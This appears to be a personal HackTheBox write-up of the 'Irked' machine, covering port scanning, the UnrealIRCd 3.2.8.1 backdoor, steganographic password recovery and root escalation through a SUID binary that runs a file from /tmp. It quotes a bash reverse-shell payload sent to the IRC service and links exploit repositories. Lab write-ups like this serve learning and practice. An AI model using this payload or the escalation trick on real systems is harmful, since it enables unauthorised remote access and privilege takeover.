Irked — HackTheBox [Creator — MrAgent]

Before starting, all of the challenges posted here are included in my learning journey. I didn’t solve them all, if I searched or learned from other senpais, I will reference them all.

Ideas:

• Recon with rustscan and detect IRCd service on port (6697, 8067, 65534)
• Exploit vulnerable IRCd version 3.2.8.1 and gain rev shell
• Found .backup file in djmardov’s Documents directory which contained password.
• Using found password to extract pass.txt in irked.jpg and log in as djmardov
• Root privilege escalation by SUID binary “viewuser”

# Recon

Starting with: rustscan — ulimit 5000 -a irked.htb — -A -sC | tee rustscan_out

Have a look at the website that is running on port 80. (In reality, I also tried to enumerate rpcbind service on port 111 and running hidden directory discovery to enumerate as much as I could but ended up nothing was really useful there.)

“IRC is almost working!” is referred to IRC service is running on other port (everyone knows that :) ). Therefore, I would look at some IRC public exploits. One of the good resources I used for PoC:

• https://github.com/sUbc0ol/3.2.8.1-of-unreal-IRC
• https://www.exploit-db.com/exploits/16922

Basically, the script sends the payload: AB; bash -c ‘bash -i >& /dev/tcp/$ip/$port 0>&1’ \n to IRC service to call a reverse connection. Knowing that, we can write a custom python script to exploit target. (Because the script that I found doesn’t work for me in my specific case). If you want to have a look at my script, you can find it here.

• https://github.com/jayngng/unreal-ircd3.2.8.1

# Shell as user djmardov

Enumeration

There is a .backup file in djmardov’s Documents folder

Have a look at the file, it provided a password to extract “irked.jpg” image (I immediately remembered the very big angry face in the website, I don’t know how to explain it because it came up to my thought unreasonably).

Extracting the image gives us “pass.txt” which we could try and log in as user djmardov.

# Shell as root

There are some quick enumerations that I would use when logged as an user, such as check id, check SUID finary, check passwd file and check crontab. Here, when checking SUID binary, “viewuser” stood out suspicious.

Try running it, we will immediately have the idea of how to get root shell.

The binary tried to find “listusers” in /tmp directory and execute it. As a result, we can inject our malicious code in the file and instruct the binary execute our code as root.

Run: /bin/bash -p, we will get shell as superuser.

P/s: this is my very first post in the learning journey. This post doesn’t mean to teach anyone of how to do stuff, so pls don’t get me wrong. Let’s learn and improve together. Thanks. :)